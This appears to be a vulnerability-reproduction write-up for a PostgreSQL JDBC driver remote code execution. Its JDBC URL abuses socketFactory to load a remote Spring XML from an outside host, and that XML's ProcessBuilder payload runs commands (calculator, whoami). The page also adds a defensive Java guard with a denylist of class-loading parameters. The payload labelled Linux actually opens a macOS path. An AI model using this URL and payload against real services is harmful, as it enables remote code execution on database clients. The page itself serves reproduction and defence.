PostgreSQL JDBC Driver RCE Reproduction



Reproduction steps

Reference: https://mp.weixin.qq.com/s/jb7mbPWdMp1vlgF8F1mshg

Demo environment used:

https://github.com/jirkapinkas/spring-boot-postgresql-docker-compose/

Download it and drag it into IDEA.

Create a new SpringJdbcTemplate2PostgreSqlApplication class:

(screenshot: image20220225163244311.png)

Code:

package com.example;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.CommandLineRunner;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.jdbc.core.JdbcTemplate;

@SpringBootApplication
public class SpringJdbcTemplate2PostgreSqlApplication implements CommandLineRunner {

    @Autowired
    private JdbcTemplate jdbcTemplate;

    public static void main(String[] args) {
        SpringApplication.run(SpringJdbcTemplate2PostgreSqlApplication.class, args);
    }

    @Override
    public void run(String... args) throws Exception {
        // Any query works here: the driver connects before this runs, and the
        // connection itself is what triggers the socketFactory instantiation.
        String sql = "INSERT INTO students (name, email) VALUES ("
                + "'Nam Ha Minh', 'nam@codejava.net')";

        int rows = jdbcTemplate.update(sql);
        if (rows > 0) {
            System.out.println("A new row has been inserted.");
        }
    }

}

application.properties configuration file:

spring.datasource.url=jdbc:postgresql://192.168.91.15:5432/postgres?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://192.168.91.1:8888/exp.xml
spring.datasource.username=postgres
spring.datasource.password=postgresql

spring.jpa.hibernate.ddl-auto=create

exp.xml (Linux version)

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bash</value>
        <value>-cc</value>
        <value>open /System/Applications/Calculator.app</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

exp.xml (Windows version)

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmd</value>
        <value>/c</value>
        <value>whoami</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

Once everything is in place, run the main method of SpringJdbcTemplate2PostgreSqlApplication and the calculator pops up.

(screenshot: image20220225163825920.png)
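The application.properties above shows the whole trigger: two query parameters on the JDBC URL, socketFactory and socketFactoryArg, that the driver turns into a class name and a constructor argument. From the defender's side, the useful check is to refuse any pgjdbc URL that carries such parameters before a DataSource is ever built from it, which matters wherever the URL comes from outside the application (a "test connection" form, a tenant-supplied config, an imported properties file). The following guard is an added example written for this page, not code from the demo project or from pgjdbc; JdbcUrlGuard, findClassLoadingParams and requireSafe are names chosen here. Besides the two parameters named on this page, the denylist also covers other pgjdbc parameters that accept class names (sslfactory, sslfactoryarg, sslhostnameverifier, sslpasswordcallback, authenticationPluginClassName), so it is broader than the single case shown above.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.Set;

/** Added example: reject pgjdbc URLs that let whoever writes the URL pick arbitrary classes. */
public final class JdbcUrlGuard {

    // pgjdbc parameters that are resolved to a class name (or handed to such a class).
    // socketFactory/socketFactoryArg are the pair abused on this page; the rest are other
    // pgjdbc parameters that take class names and deserve the same treatment.
    private static final Set<String> CLASS_LOADING_PARAMS = Set.of(
            "socketfactory", "socketfactoryarg",
            "sslfactory", "sslfactoryarg",
            "sslhostnameverifier", "sslpasswordcallback",
            "authenticationpluginclassname");

    private JdbcUrlGuard() {}

    /** Returns the query parameters of a JDBC URL, keyed by lower-cased, URL-decoded name. */
    static Map<String, String> queryParams(String jdbcUrl) {
        Map<String, String> params = new LinkedHashMap<>();
        int q = jdbcUrl.indexOf('?');
        if (q < 0 || q == jdbcUrl.length() - 1) {
            return params;
        }
        for (String pair : jdbcUrl.substring(q + 1).split("&")) {
            if (pair.isEmpty()) {
                continue;
            }
            int eq = pair.indexOf('=');
            String name = eq < 0 ? pair : pair.substring(0, eq);
            String value = eq < 0 ? "" : pair.substring(eq + 1);
            // Decode before comparing so percent-encoded names cannot slip past the check.
            params.put(URLDecoder.decode(name, StandardCharsets.UTF_8).toLowerCase(Locale.ROOT),
                       URLDecoder.decode(value, StandardCharsets.UTF_8));
        }
        return params;
    }

    /** Lists every offending parameter as name=value; an empty list means the URL is acceptable. */
    static List<String> findClassLoadingParams(String jdbcUrl) {
        List<String> hits = new ArrayList<>();
        if (!jdbcUrl.startsWith("jdbc:postgresql:")) {
            return hits; // only pgjdbc URLs are in scope for this guard
        }
        for (Map.Entry<String, String> e : queryParams(jdbcUrl).entrySet()) {
            if (CLASS_LOADING_PARAMS.contains(e.getKey())) {
                hits.add(e.getKey() + "=" + e.getValue());
            }
        }
        return hits;
    }

    /** Throws if the URL carries any class-loading parameter; call this before building the DataSource. */
    static String requireSafe(String jdbcUrl) {
        List<String> hits = findClassLoadingParams(jdbcUrl);
        if (!hits.isEmpty()) {
            throw new IllegalArgumentException("JDBC URL sets class-loading parameters: " + hits);
        }
        return jdbcUrl;
    }

    public static void main(String[] args) {
        // Constructed sample inputs: the URL from this page's application.properties and a plain one.
        String malicious = "jdbc:postgresql://192.168.91.15:5432/postgres"
                + "?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext"
                + "&socketFactoryArg=http://192.168.91.1:8888/exp.xml";
        String plain = "jdbc:postgresql://192.168.91.15:5432/postgres?ssl=true";

        System.out.println("malicious -> " + findClassLoadingParams(malicious));
        System.out.println("plain     -> " + findClassLoadingParams(plain));
        try {
            requireSafe(malicious);
        } catch (IllegalArgumentException ex) {
            System.out.println("rejected: " + ex.getMessage());
        }
    }
}
```

The parse is deliberately independent of java.net.URI, because "jdbc:postgresql://..." is an opaque URI to that class and the parameter names are the only thing the guard cares about. Matching is case-insensitive after decoding, since pgjdbc itself is not strict about case for these names. This guard is a compensating control for URLs that arrive at runtime; the primary fix is still running a patched pgjdbc release that no longer instantiates arbitrary classes from these parameters.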

Vulnerability analysis

Just read Skay's analysis!